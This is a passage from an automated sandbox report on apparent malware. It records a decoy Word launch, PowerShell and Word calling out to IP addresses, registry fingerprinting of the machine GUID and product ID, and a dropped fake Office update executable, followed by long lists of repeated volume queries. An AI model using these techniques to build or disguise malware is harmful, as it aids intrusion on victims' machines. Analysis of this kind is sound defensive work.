Starts Microsoft Word (often done to prevent that the user detects that something wrong)

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 91.219.236.207 80
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Network Connect: 88.221.14.177 80

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the product ID of Windows

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
